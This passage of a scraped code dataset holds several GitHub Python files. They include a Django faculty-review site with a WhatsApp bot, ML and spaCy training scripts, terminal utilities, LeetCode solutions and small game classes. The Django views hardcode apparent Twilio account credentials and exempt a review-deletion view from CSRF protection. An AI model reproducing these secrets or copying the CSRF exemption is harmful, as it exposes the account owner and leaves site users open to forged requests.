UserFacultyRev.objects.filter(review=rev_id).update(downvotes=dislikes + 1)\n except:\n print('Could not execute')\n rev = UserFacultyRev.objects.get(review=rev_id)\n likes = rev.upvotes\n dislikes = rev.downvotes\n json_response = {\n 'likes': likes,\n 'dislikes': dislikes\n }\n return JsonResponse(json_response)\n\n msg = \"Could not dislike the review\"\n return HttpResponse(msg)\n\n\n@login_required(login_url='sign_in')\ndef report(request):\n if request.method == 'POST':\n rev_id = request.POST.get('rev_id', None)\n try:\n rev = UserFacultyRev.objects.get(review=rev_id)\n rev.report_count = rev.report_count + 1\n msg = 'Thank you for reporting the view'\n return HttpResponse(msg)\n except:\n print('Could not report review')\n msg = \"Could not report review\"\n return HttpResponse(msg)\n\n\n@csrf_exempt\n@login_required(login_url='sign_in')\ndef delete_review(request):\n if request.method == 'POST':\n print('Here')\n rev_id = request.POST.get('rev_id', None)\n print(rev_id)\n 
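The `like()` and `dislike()` views above read a counter, add or subtract one in Python, then write it back; under concurrent requests that read-modify-write can drop votes. Django's `F()` expressions push the arithmetic into a single UPDATE. A sketch under that assumption; `add_upvote` is a hypothetical helper, and `UserFacultyRev` is the model the record star-imports from `.models`:

```python
from django.db.models import F
# from .models import UserFacultyRev  # model from the record's app

# Sketch: increment atomically in the database instead of in Python.
def add_upvote(rev_id):
    UserFacultyRev.objects.filter(review=rev_id).update(
        upvotes=F('upvotes') + 1
    )
```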
try:\n print('Here First')\n try:\n misc = FacultyMiscellaneous.objects.get(review_id=rev_id)\n misc.delete()\n except:\n print('Misc: ')\n\n try:\n personality = FacultyPersonality.objects.get(review_id=rev_id)\n personality.delete()\n except:\n print('Personality: ')\n\n try:\n workload = FacultyWorkload.objects.get(review_id=rev_id)\n workload.delete()\n except:\n print('Workload: ')\n\n record = UserFacultyRev.objects.get(review=rev_id)\n record.delete()\n print('Review')\n\n except:\n print('Could not delete review')\n print('Redirect to dashboard')\n return redirect(dashboard)\n\n return render(request, './error.html')\n\n\n@login_required(login_url='sign_in')\ndef change_username(request):\n if request.method == \"POST\":\n uname = request.user.username\n user = User.objects.get(username=uname)\n new_username = request.POST.get('uname')\n user.username = new_username\n user.save()\n return HttpResponse(user.username)\n\n return render(request, './error.html')\n\n\n@login_required(login_url='sign_in')\ndef change_fname(request):\n if request.method == \"POST\":\n uname = request.user.username\n user = User.objects.get(username=uname)\n new_fname = request.POST.get('fname')\n user.first_name = new_fname\n user.save()\n return HttpResponse(user.first_name)\n\n return render(request, './error.html')\n\n\n@login_required(login_url='sign_in')\ndef change_lname(request):\n if request.method == \"POST\":\n uname = request.user.username\n user = User.objects.get(username=uname)\n new_lname = request.POST.get('lname')\n user.last_name = new_lname\n user.save()\n return HttpResponse(user.last_name)\n\n return render(request, './error.html')\n\n\n@login_required(login_url='sign_in')\ndef change_email(request):\n if request.method == \"POST\":\n uname = request.user.username\n user = User.objects.get(username=uname)\n new_email = request.POST.get('email')\n user.email = new_email\n user.save()\n return HttpResponse(user.email)\n\n return render(request, './error.html')\n\n\ndef function_send_mail (user_email,subject,message):\n send_mail(\n subject,\n message,\n 'ratezone22@gmail.com',\n [user_email],\n fail_silently=False,\n )\n return 1\n\n\ndef language (request):\n request.session.modified = True\n\n if request.method == \"POST\":\n \n num = request.session.get('lan')\n\n print(num)\n\n if num is None:\n request.session['lan'] ='ar'\n elif request.session['lan'] =='ar' :\n request.session['lan'] = 'en'\n elif request.session['lan'] =='en' :\n request.session['lan'] = 'ar'\n \n \n print(request.session['lan'])\n # print(request.path_info)\n\n # return HttpResponseRedirect(\"/\")\n return redirect(home)\n \n\n\naccount_sid = 'AC769a838aa381b9b6e804efb14d04faf7'\nauth_token = '7e846e71e2c5cdf8e0941ecd4788e6ed'\nclient = Client(account_sid, auth_token)\n\n\n@csrf_exempt\ndef bot(request):\n \n \n if request.method == 'POST':\n message=request.POST[\"Body\"]\n message= message.split()\n print(message)\n how_send_name=request.POST[\"ProfileName\"]\n how_send_number=request.POST[\"From\"]\n\n str_m='Error'\n \n if (message[0]== \"Department\" or message[0]== \"department\") and len(message) ==1 :\n d = Department.objects.all().order_by('dept_name')\n\n str_m= 'Here all department in ku:\\n'\n j=1\n for i in d :\n str_m += '{}- {} \\n'.format(j,i)\n j+=1\n \n \n\n\n elif (message[0]== \"Department\" or message[0]== \"department\") and len(message)>1 :\n\n try:\n str_d=''\n for z in range(1, len(message)) :\n str_d+= '{}'.format(message[z])\n if(z<(len(message)-1)):\n str_d+= ' '\n\n # str_d+= 'A'\n 
print(str_d)\n\n d=Department.objects.get(dept_name=str_d)\n\n p = Employee.objects.filter(main_rank='Faculty', department_id=d.department).order_by('fname')\n # print(p)\n\n str_m= 'Here are all instructors in the *{}* department:\\n'.format(d.dept_name)\n j=1\n for i in p :\n str_m += '{}- {} {}\\n'.format(j,i.fname,i.lname)\n j+=1\n\n if j==1:\n str_m='*No information to see*'\n\n except:\n str_m = 'Invalid department name, please try again'\n\n elif message[0]== \"Instructor\" or message[0]== \"instructor\" :\n\n try :\n \n fname = message[1]\n lname = message[2]\n\n em = Employee.objects.get(fname=fname, lname=lname)\n\n \n revs = UserFacultyRev.objects.filter(employee=em).order_by('-review')[0:3]\n rev_count = UserFacultyRev.objects.filter(employee_id=em.employee).aggregate(Count('review'))\n\n \n if(rev_count['review__count'] !=0):\n str_m= 'Here is some information about instructor:\\n*{} {}*\\n{} department \\n\\n'.format(message[1],message[2],em.department)\n str_m += 'Overall rating based on {} votes is: *{:.2f}/5*\\n\\n'.format(rev_count['review__count'],em.overall_rating)\n else :\n str_m= 'Here is some information about instructor:\\n*{} {}*\\n{} department \\n\\n'.format(message[1],message[2],em.department)\n str_m += \"*Unfortunately* we don't have any votes until now\\n\\n\"\n j=1\n for i in revs :\n str_m += '{}- Overall is {}\\n thought is \"{}\"\\n'.format(j,i.overall_rating,i.student_thoughts)\n j+=1\n\n str_m += '\\nfor more information about {} {}\\nClick the URL:\\n*https://ratezone.io/instructor/{}/* \\n*OR* \\nyou can visit web site:\\n*ratezone.io* '.format(message[1],message[2],em.employee)\n\n except:\n str_m = 'Invalid instructor name, please try again'\n\n elif message[0]== \"Help\":\n str_m='*Department*\\nto list all departments\\n\\n*Department* \\nto list instructor names\\n\\n*Instructor* \\nsummary about instructor\\n'\n\n else :\n str_m = \"Welcome {} to Rate Zone BOT\\nsend *Help* to show available options.\\n\".format(how_send_name)\n \n\n \n \n m=client.messages.create(\n from_='whatsapp:+14155238886',\n body=str_m,\n to=how_send_number\n )\n\n # how_send_name=request.POST[\"ProfileName\"]\n # how_send_number=request.POST[\"From\"]\n # print(request.POST)\n print('Whatsapp connection:', how_send_number)\n return HttpResponse(\"thank you\")\n","repo_name":"mohamad-selman/RateZone-src","sub_path":"ratezone/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":34395,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"13253222045","text":"'''\nPerform runtime diagnostics on the ML classifiers.\n'''\n\nimport time\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier, PassiveAggressiveClassifier, Perceptron\nfrom settings import PERCENT_TRAIN\nfrom model import load, train_test_split\n\n### BUILD MODELS ###\n\nclassifiers = {\n 'SGD': SGDClassifier(loss='hinge', penalty='l2', alpha=1e-3, max_iter=10),\n 'Perceptron': Perceptron(),\n 'NB Multinomial': MultinomialNB(alpha=0.001),\n 'Passive-Aggressive': PassiveAggressiveClassifier()\n}\n\npre_processor = Pipeline([('vect', CountVectorizer(ngram_range=(1, 2))),\n ('tfidf', TfidfTransformer(use_idf=True))])\n\n\n### LOAD DATA ### \n\nclasses = list(range(21))\ntrain_snippets, train_labels, test_snippets, test_labels = train_test_split(PERCENT_TRAIN, load())\n\n### TRAIN VECTORIZER AND
TRANSFORM RAW INPUT ###\n\ntrain_snippets_processed = pre_processor.fit_transform(train_snippets)\ntest_snippets_processed = pre_processor.transform(test_snippets)\n\n\n### BATCH DATA ###\n\nn_batch = 100\nn_train = len(train_snippets)\nbatch_size = int(n_train / n_batch)\n\ndef _batch(i):\n '''\n Get the (i+1)-th batch of train_snippets and train_labels.\n '''\n return train_snippets_processed[i*batch_size:(i+1)*batch_size], train_labels[i*batch_size:(i+1)*batch_size]\n\n\n### RUNTIME DATA ### \n\nstats = {}\nfor cls_name in classifiers:\n _stats = {'times': [], 'accuracies': [], 'n_examples': []}\n stats[cls_name] = _stats\n\n\n### MAIN LOOP ###\n\nfor i in range(n_batch):\n\n snippet_batch, label_batch = _batch(i)\n\n for cls_name, classifier in classifiers.items():\n stats[cls_name]['n_examples'].append(batch_size)\n\n # update estimator with examples in the current batch\n tick = time.time()\n classifier.partial_fit(snippet_batch, label_batch, classes=classes)\n stats[cls_name]['times'].append(time.time() - tick)\n\n # predict and record accuracy\n accuracy = classifier.score(test_snippets_processed, test_labels)\n stats[cls_name]['accuracies'].append(accuracy)\n\n\n### OUTPUT ###\n\nfname = 'data/exp3.txt'\nf = open(fname, 'w')\nf.write(str(stats))\nf.close()","repo_name":"andrewdircks/lang_classifier","sub_path":"runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73887036919","text":"'''A dictionary is a set of key:value pairs.\nThe main difference between a dictionary and a list\nis the presence of keys in it.\n'''\n\npallette = {\n 'red': '#ff335c',\n 'yellow': '#ffff85',\n 'mint': '#3eb489',\n 'violet': '#9933ff'\n} # to pull a value out of the dictionary,\n# refer to the dictionary's name and put the\n# name of the !!!KEY!!! inside []\nprint(f\"My favourite color is {pallette['violet']}!\")\n# this does not work: print(f\"My favourite color is {pallette['#ff335c']}!\")\nprint(pallette.keys()) # to see the list of all keys\n","repo_name":"GreatRaksin/Saturday3pm","sub_path":"1303_dictionaries_and_JSON/00_dictionaries_theory.py","file_name":"00_dictionaries_theory.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19951295139","text":"#!/usr/bin/env python\n# coding: utf8\n\"\"\"Example of training an additional entity type\nThis script shows how to add a new entity type to an existing pretrained NER\nmodel. To keep the example short and simple, only four sentences are provided\nas examples. In practice, you'll need many more — a few hundred would be a\ngood start. You will also likely need to mix in examples of other entity\ntypes, which might be obtained by running the entity recognizer over unlabelled\nsentences, and adding their annotations to the training set.\nThe actual training is performed by looping over the examples, and calling\n`nlp.entity.update()`. The `update()` method steps through the words of the\ninput. At each word, it makes a prediction. It then consults the annotations\nprovided on the GoldParse instance, to see whether it was right. If it was\nwrong, it adjusts its weights so that the correct action will score higher\nnext time.\nAfter training your model, you can save it to a directory.
We recommend\nwrapping models as Python packages, for ease of deployment.\nFor more details, see the documentation:\n* Training: https://spacy.io/usage/training\n* NER: https://spacy.io/usage/linguistic-features#named-entities\nCompatible with: spaCy v2.1.0+\nLast tested with: v2.2.4\n\"\"\"\nfrom __future__ import unicode_literals, print_function\n\nimport plac\nimport random\nimport warnings\nfrom pathlib import Path\nimport spacy\nfrom spacy.util import minibatch, compounding\nimport pickle\nimport re\n\n\nfrom NER_KBC_MedicalTexts.model import en_ner_disease_chem, en_ner_bionlp\n\n\n\nimport en_core_web_lg\nnlp = en_core_web_lg.load()\n# nlp = en_ner_bionlp.load()\n# nlp = en_ner_disease_chem.load()\n\nDATA_DIR = \"data/processed/data_medium.json\"\n\n# new entity label\n# LABEL = \"ANIMAL\"\n\n# # training data\n# # Note: If you're using an existing model, make sure to mix in examples of\n# # other entity types that spaCy correctly recognized before. Otherwise, your\n# # model might learn the new type, but \"forget\" what it previously knew.\n# # https://explosion.ai/blog/pseudo-rehearsal-catastrophic-forgetting\n# TRAIN_DATA = [\n# (\n# \"Horses are too tall and they pretend to care about your feelings\",\n# {\"entities\": [(0, 6, LABEL)]},\n# ),\n# (\"Do they bite?\", {\"entities\": []}),\n# (\n# \"horses are too tall and they pretend to care about your feelings\",\n# {\"entities\": [(0, 6, LABEL)]},\n# ),\n# (\"horses pretend to care about your feelings\", {\"entities\": [(0, 6, LABEL)]}),\n# (\n# \"they pretend to care about your feelings, those horses\",\n# {\"entities\": [(48, 54, LABEL)]},\n# ),\n# (\"horses?\", {\"entities\": [(0, 6, LABEL)]}),\n# ]\n\n\n\n\n\nwith open(DATA_DIR, \"rb\") as fp: # Unpickling\n TRAIN_DATA = pickle.load(fp)\n# counter = 0\n# for data in TRAIN_DATA:\n# print(\"Grabbing sentence: \", str(counter+1))\n# # print(data[0])\n# if data[0] is \"\":\n# TRAIN_DATA.remove(data)\n# counter+=1\n#\n# with open(\"data/processed/new_data.json\", \"wb+\") as fp:\n# print(\"Saving trimmed data to: \", \"data/processed/new_data.json\")\n# pickle.dump(TRAIN_DATA, fp)\n\n\n\n@plac.annotations(\n model=(\"Model name. 
Defaults to blank 'en' model.\", \"option\", \"m\", str),\n new_model_name=(\"New model name for model meta.\", \"option\", \"nm\", str),\n output_dir=(\"Optional output directory\", \"option\", \"o\", Path),\n n_iter=(\"Number of training iterations\", \"option\", \"n\", int),\n)\n\n\n\ndef main(model=nlp, new_model_name=\"biomedical\", output_dir=\"model/002/\", n_iter=200):\n \"\"\"Set up the pipeline and entity recognizer, and train the new entity.\"\"\"\n random.seed(0)\n if model is not None:\n nlp = spacy.load(model) # load existing spaCy model\n print(\"Loaded model '%s'\" % model)\n else:\n nlp = spacy.blank(\"en\") # create blank Language class\n print(\"Created blank 'en' model\")\n # Add entity recognizer to model if it's not in the pipeline\n # nlp.create_pipe works for built-ins that are registered with spaCy\n if \"ner\" not in nlp.pipe_names:\n ner = nlp.create_pipe(\"ner\")\n nlp.add_pipe(ner)\n # otherwise, get it, so we can add labels to it\n else:\n ner = nlp.get_pipe(\"ner\")\n\n\n # # ner.add_label(\"ANIMAL\")\n ner.add_label(\"BACTERIA\") # add new entity label to entity recognizer\n # # Adding extraneous labels shouldn't mess anything up\n # ner.add_label(\"VIRUS\")\n # ner.add_label(\"DISEASE\")\n # ner.add_label(\"GENE\")\n # ner.add_label(\"BODY\")\n # ner.add_label(\"ANTIBIOTIC\")\n ner.add_label(\"PERSON\")\n ner.add_label(\"NORP\")\n ner.add_label(\"FAC\")\n ner.add_label(\"ORG\")\n ner.add_label(\"GPE\")\n ner.add_label(\"LOC\")\n ner.add_label(\"PRODUCT\")\n ner.add_label(\"EVENT\")\n ner.add_label(\"WORK_OF_ART\")\n ner.add_label(\"LAW\")\n ner.add_label(\"LANGUAGE\")\n ner.add_label(\"DATE\")\n ner.add_label(\"TIME\")\n ner.add_label(\"PERCENT\")\n ner.add_label(\"MONEY\")\n ner.add_label(\"QUANTITY\")\n ner.add_label(\"ORDINAL\")\n ner.add_label(\"CARDINAL\")\n\n\n\n\n if model is None:\n optimizer = nlp.begin_training()\n else:\n optimizer = nlp.resume_training()\n move_names = list(ner.move_names)\n # get names of other pipes to disable them during training\n pipe_exceptions = [\"ner\", \"trf_wordpiecer\", \"trf_tok2vec\"]\n other_pipes = [pipe for pipe in nlp.pipe_names if pipe not in pipe_exceptions]\n # only train NER\n with nlp.disable_pipes(*other_pipes) and warnings.catch_warnings():\n # show warnings for misaligned entity spans once\n warnings.filterwarnings(\"once\", category=UserWarning, module='spacy')\n\n sizes = compounding(1.0, 4.0, 1.001)\n # batch up the examples using spaCy's minibatch\n for itn in range(n_iter):\n random.shuffle(TRAIN_DATA)\n batches = minibatch(TRAIN_DATA, size=sizes)\n losses = {}\n for batch in batches:\n texts, annotations = zip(*batch)\n nlp.update(texts, annotations, sgd=optimizer, drop=0.35, losses=losses)\n print(\"Losses\", losses)\n\n # test the trained model\n test_text = \"Shigella is a bacterium and Erbovirus is a virus. But horses are animals. Meltem is my name. John Smith is not. 
E.Coli is also a Bacterium.\"\n doc = nlp(test_text)\n print(\"Entities in '%s'\" % test_text)\n for ent in doc.ents:\n print(ent.label_, ent.text)\n\n # save model to output directory\n if output_dir is not None:\n output_dir = Path(output_dir)\n if not output_dir.exists():\n output_dir.mkdir()\n nlp.meta[\"name\"] = new_model_name # rename model\n nlp.to_disk(output_dir)\n print(\"Saved model to\", output_dir)\n\n # test the saved model\n print(\"Loading from\", output_dir)\n nlp2 = spacy.load(output_dir)\n # Check the classes have loaded back consistently\n assert nlp2.get_pipe(\"ner\").move_names == move_names\n doc2 = nlp2(test_text)\n for ent in doc2.ents:\n print(ent.label_, ent.text)\n\n\nif __name__ == \"__main__\":\n plac.call(main)\n","repo_name":"5Y5TEM/NLP-BioMed","sub_path":"named_entity_recognition.py","file_name":"named_entity_recognition.py","file_ext":"py","file_size_in_byte":7058,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"13999807332","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\n\nimport os\nimport sys\nimport subprocess\nimport locale\nimport logging\n\nlogger = logging.getLogger('solvebio')\n\ntry:\n # reload() for Python3\n from importlib import reload\nexcept ImportError:\n pass\n\nstd_handles = [sys.stdin, sys.stdout, sys.stderr]\ntry:\n # Switch from the default input ASCII encoding to the default locale.\n # The Python runtime will use this when it has to decode a\n # string buffer to unicode. This is not needed in Python3.\n\n # However reload(sys), used below resets stdin, stdout, and stderr\n # which is bad if they've already been reassigned. An ipython\n # notebook shell, for example, sets up its own stdout.\n # See GitHub issue #43 and #21.\n reload(sys).setdefaultencoding(locale.getdefaultlocale()[1])\n locale.setlocale(locale.LC_ALL, '')\nexcept:\n pass\nfinally:\n sys.stdin, sys.stdout, sys.stderr = std_handles\n\n\n# Set rows and columns and colors\n\ndef set_from_env(name, default_value):\n try:\n return int(os.environ[name])\n except:\n return default_value\n\n\nTTY_ROWS = set_from_env('LINES', 24)\nTTY_COLS = set_from_env('COLUMNS', 80)\n\nTTY_COLORS = True\n\nif sys.stdout.isatty():\n try:\n with open(os.devnull, 'w') as fnull:\n rows, cols = subprocess.check_output(\n ['stty', 'size'],\n stderr=fnull).split()\n TTY_ROWS = int(rows)\n TTY_COLS = int(cols)\n except:\n logger.warn('Cannot detect terminal column width.\\nUsing value '\n 'from environment variables and/or internal defaults.')\nelse:\n TTY_COLORS = False\n\n\ndef pretty_int(num):\n return locale.format(\"%d\", int(num), grouping=True)\n\n\n# Basic color support\n\ndef green(text):\n if not TTY_COLORS:\n return text\n return '\\033[32m' + text + '\\033[39m'\n\n\ndef red(text):\n if not TTY_COLORS:\n return text\n return '\\033[31m' + text + '\\033[39m'\n\n\ndef yellow(text):\n if not TTY_COLORS:\n return text\n return '\\033[33m' + text + '\\033[39m'\n\n\ndef blue(text):\n if not TTY_COLORS:\n return text\n return '\\033[34m' + text + '\\033[39m'\n\n\ndef pager(fn, **kwargs):\n try:\n import tty\n fd = sys.stdin.fileno()\n old = tty.tcgetattr(fd)\n tty.setcbreak(fd)\n\n def getchar():\n sys.stdin.read(1)\n except (ImportError, AttributeError):\n tty = None\n\n def getchar():\n sys.stdin.readline()[:-1][:1]\n\n try:\n page = 1\n res = fn(page=page, **kwargs)\n has_next = res.links['next']\n sys.stdout.write(str(res) + '\\n')\n\n while has_next:\n sys.stdout.write('-- More --')\n 
sys.stdout.flush()\n c = getchar()\n page += 1\n res = fn(page=page, **kwargs)\n has_next = res.links['next']\n\n if c in ('q', 'Q'):\n sys.stdout.write('\\r \\r')\n break\n\n sys.stdout.write('\\n' + str(res) + '\\n')\n finally:\n if tty:\n tty.tcsetattr(fd, tty.TCSAFLUSH, old)\n","repo_name":"solvebio/solvebio-python","sub_path":"solvebio/utils/printing.py","file_name":"printing.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"3642193676","text":"class Solution:\n # @param words, a list of strings\n # @param L, an integer\n # @return a list of string\n \n def fullJustify(self, words, L):\n result=[]\n candid=[]\n cur_L=0\n for temp in words:\n if candid==[]:\n candid.append(temp)\n cur_L+=len(temp)\n else:\n if cur_L+1+len(temp)>L: #we can't hold another word in this line\n #now it's time to pour candid into result\n if len(candid)==1:\n temp_line=candid[0]+' '*(L-len(candid[0]))\n else:\n num_space=(L-cur_L)//(len(candid)-1) # floor division keeps num_space an int on Python 3\n left_add=(L-cur_L)%(len(candid)-1) # decide the number of left words having additional space\n temp_line=candid[0]\n for i in range(1,len(candid)):\n if left_add>0:\n left_add-=1\n temp_line+=' '*(num_space+2)+candid[i]\n else:\n temp_line+=' '*(num_space+1)+candid[i]\n result.append(temp_line)\n #now start over again\n candid=[temp]\n cur_L=len(temp)\n else:\n candid.append(temp)\n cur_L+=len(temp)+1\n if candid==[]: return [] #nothing left\n else:\n temp_line=candid[0]\n for i in range(1,len(candid)):\n temp_line+=' '+candid[i]\n temp_line+=' '*(L-cur_L)\n result.append(temp_line) \n return result\n","repo_name":"ssydyc/Leetcode_python","sub_path":"Text_Justification.py","file_name":"Text_Justification.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16596246438","text":"import random\n\"\"\"\nClasses concerning the game objects.\nApples, walls, static and movable objects\n\"\"\"\n\n\nclass StaticObject:\n\n def __init__(self, tag, x, y):\n self._id = tag\n self._x = x\n self._y = y\n\n\nclass MovableObject(StaticObject):\n\n def __init__(self, tag, x, y, direction):\n super().__init__(tag, x, y)\n self._direction = direction\n\n\nclass Apple(StaticObject):\n\n def __init__(self, tag, x, y):\n super().__init__(tag, x, y)\n self._value = random.randint(0, 10)\n\n if self._value < 3:\n self._color = (255, 0, 0)\n elif self._value >= 3 and self._value < 6:\n self._color = (0, 255, 0)\n elif self._value >= 6 and self._value <= 9:\n self._color = (0, 0, 255)\n elif self._value == 10:\n self._color = (242, 255, 0)\n\n\nclass Wall:\n\n def __init__(self, tag, x_i, y_i, x_f, y_f):\n self._id = tag\n self._x_i = x_i\n self._y_i = y_i\n self._x_f = x_f\n self._y_f = y_f\n","repo_name":"eHonnef/python-snakes","sub_path":"Objects.py","file_name":"Objects.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38008006306","text":"# dictionaries\n\nd = {}\n\n# assigning a list as a key raises an error:\n# a list is a mutable data type\n# TypeError: unhashable type: 'list'\nlk = [1,3,5]\nlv = [1,3,5,7,9]\nd[lk] = lv\nprint(d)","repo_name":"jinygod/Programming-Language","sub_path":"python/syntax/dicts/s04-dict-list-2.py","file_name":"s04-dict-list-2.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
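A minimal follow-up sketch for the dictionary record above: only hashable (immutable) types can serve as dict keys, so converting the list key to a tuple avoids the TypeError noted in the comments. Variable names mirror the record's own (lk, lv).

d = {}
lk = (1, 3, 5)        # tuples are immutable, hence hashable
lv = [1, 3, 5, 7, 9]  # the value may remain a mutable list
d[lk] = lv
print(d)              # {(1, 3, 5): [1, 3, 5, 7, 9]}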
+{"seq_id":"15590248250","text":"from typing import List\n\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n # We can first sort the array (O nlogn), and say we want to acheieve a+b+c=0\n # We can lock the \"a\" and solve the TwoSum problem with target=\"-a\" (O n) \n # And if \"a\" is >= 1, we can finish the problem \n # After we finish the \"a\", we have to jump to the last \"a\" if there are duplicate \"a\"s\n \n # For the two sum problem, we can use \"left\" and \"right\" pointers\n # if the sum is bigger than \"-a\", we move \"right\" - 1\n # if the sum is less than \"-a\", we move \"left\" + 1\n \n res = []\n nums.sort()\n \n for i in range(len(nums)):\n if i > 0 and nums[i] == nums[i-1]:\n continue\n \n if nums[i] >= 1:\n break\n \n target = -nums[i]\n l, r = i + 1, len(nums) - 1\n \n while l < r:\n s = nums[l] + nums[r]\n if s > target:\n r -= 1\n elif s < target:\n l += 1\n else:\n res.append([nums[i], nums[l], nums[r]])\n l += 1\n while nums[l] == nums[l-1] and l < r:\n l += 1\n return res\n","repo_name":"windsuzu/Leetcode-Python","sub_path":"code/array/3-sum.py","file_name":"3-sum.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34626851158","text":"import torch\nfrom torch import Tensor\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom typing import Optional\n\n\"\"\"\nLinear Function for Graph\nIt combines dropout, linear, activation layers.\n\nArgs:\n node_input_size: the number features of node in the linear layer inputs (required)\n edge_input_size: the number features of edge in the linear layer inputs (optional)\n cond_size: the number of feature of condition vector (optional)\n node_output_size: the number features of node in the linear layer outputs (required)\n edge_output_size: the number features of edge in the linear layer outputs (optional)\n activation: the activation function (required)\n dropout: the dropout value (required)\n\nInput:\n nodes: the nodes' feature (required)\n edges: the edges' feature (optional)\n condition: the condition vector's feature (optional)\n\nShape:\n nodes: (N, V, Fv)\n edges: (N, V, V, Fe)\n condition: (N, Fl) or (N, V, Fl)\n\nNote:\n if a condition vector exists, it is combined with the nodes feature vector.\n >> condition = condition.repeat(1, num_nodes, 1) (when the dim of condition is (N, F))\n >> nodes = torch.cat([nodes, condition], -1)\n\nOutput:\n nodes: (N, V, Fv')\n edges: (N, V, V, Fe') (optional)\n\"\"\"\n\nACT_LIST = {\n 'relu': F.relu, \n 'tanh': torch.tanh, \n 'sigmoid': torch.sigmoid, \n 'leaky_relu': F.leaky_relu\n}\n\nclass GraphLinear(nn.Module) :\n def __init__(self, node_input_size: int, edge_input_size: Optional[int], cond_input_size: Optional[int],\n node_output_size: int, edge_output_size: Optional[int], activation: str, dropout: float) :\n super(GraphLinear, self).__init__()\n if cond_input_size is None :\n cond_input_size = 0\n self.node_linear = nn.Linear(node_input_size + cond_input_size, node_output_size)\n if edge_input_size is not None and edge_input_size != 0 :\n self.edge_linear = nn.Linear(edge_input_size, edge_output_size)\n self.activation = ACT_LIST.get(activation, None)\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, nodes: Tensor, edges: Optional[Tensor] = None, condition: Optional[Tensor] = None) :\n assert (edges is None) ^ (hasattr(self, 'edge_linear'))\n if condition is not None :\n cs = condition.size()\n if len(cs) == 2 : # condition: 
[B, F]\n num_nodes = nodes.size(1)\n condition = condition.unsqueeze(1)\n condition = condition.repeat(1, num_nodes, 1)\n elif len(cs) == 3 : # condition: [B, N, F]\n pass\n else :\n print(\"ERROR: Argument 3 of GraphEmbedding layer should be [batch, num_node, feature] or [batch, feature]\")\n exit(-1)\n nodes = torch.cat([nodes, condition], -1)\n\n _nodes = self.dropout(nodes)\n _nodes = self.node_linear(_nodes)\n if self.activation is not None :\n _nodes = self.activation(_nodes)\n\n if edges is not None :\n _edges = self.edge_linear(edges)\n if self.activation is not None :\n _edges = self.activation(_edges)\n return _nodes, _edges\n else :\n return _nodes\n\nclass Linear(nn.Module) :\n def __init__(self, input_size: int, output_size:int, activation: str, bias: bool, dropout: float) :\n super(Linear, self).__init__()\n self.linear = nn.Linear(input_size, output_size, bias=bias)\n self.dropout = nn.Dropout(p=dropout)\n self.activation = ACT_LIST.get(activation, None)\n \n def forward(self, x: Tensor) :\n _x = self.dropout(x)\n y = self.linear(_x)\n if self.activation is not None :\n y = self.activation(y)\n return y\n","repo_name":"jaechang-hits/BBAR-pytorch","sub_path":"src/layer/layers/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"41066054645","text":"import os\nfrom random import shuffle\nfrom time import time\n\nimport cv2\nimport numpy as np\nimport pytesseract\nfrom progress.spinner import Spinner\n\nimport arguments as args\nimport consts as c\n\n\ndef whether_rectangles_overlap(r1_coords, r2_coords):\n if r1_coords[0] >= r2_coords[2] or r1_coords[2] <= r2_coords[0] \\\n or r1_coords[3] <= r2_coords[1] or r1_coords[1] >= r2_coords[3]:\n return False\n return True\n\n\ndef get_scaled_watermarks(wmark_img, min_scale):\n scaled_wmark_imgs = {}\n for wmark_scale in scale_generator(min_scale):\n scaled_wmark_imgs[wmark_scale] = cv2.resize(\n wmark_img, (0, 0), fx=wmark_scale, fy=wmark_scale\n )\n return scaled_wmark_imgs\n\n\ndef scale_generator(min_scale):\n for s_i in range(10, int(min_scale * 10) - 1, -1):\n wmark_scale_to_yield = round(s_i / 10, 1)\n yield wmark_scale_to_yield\n\n\ndef find_suitable_areas(unsuitable_blocks, img_w, img_h, gr_img, edges_img):\n \"\"\"Find areas to place watermarks having different size.\n\n Arguments:\n not_suitable_blocks {[type]} -- areas unsuitable for watermarks.\n \"\"\"\n suitable_areas = []\n for wmark_scale in scale_generator(args.min_wm_scale):\n cur_scl_not_suitable_blocks = set(unsuitable_blocks)\n spinner = Spinner(\n f'Available space estimating for watermark scale {wmark_scale}...',\n )\n # Watermark current width and height in pixels.\n scaled_mark_width = round(wm_w * wmark_scale)\n scaled_mark_height = round(wm_h * wmark_scale)\n # The values are used to determine if at least one watermark can be\n # placed.\n marks_in_img_along_x = img_w // scaled_mark_width\n marks_in_img_along_y = img_h // scaled_mark_height\n if marks_in_img_along_x > 0 and marks_in_img_along_y > 0:\n y = 0\n while y + scaled_mark_height < img_h:\n x = 0\n # Filter out blocks above y.\n cur_scl_not_suitable_blocks = set(filter(\n lambda bl: bl[3] >= y,\n cur_scl_not_suitable_blocks\n ))\n while x + scaled_mark_width < img_w:\n potential_mark_rect = (\n x, y, x + scaled_mark_width,\n y + scaled_mark_height\n )\n 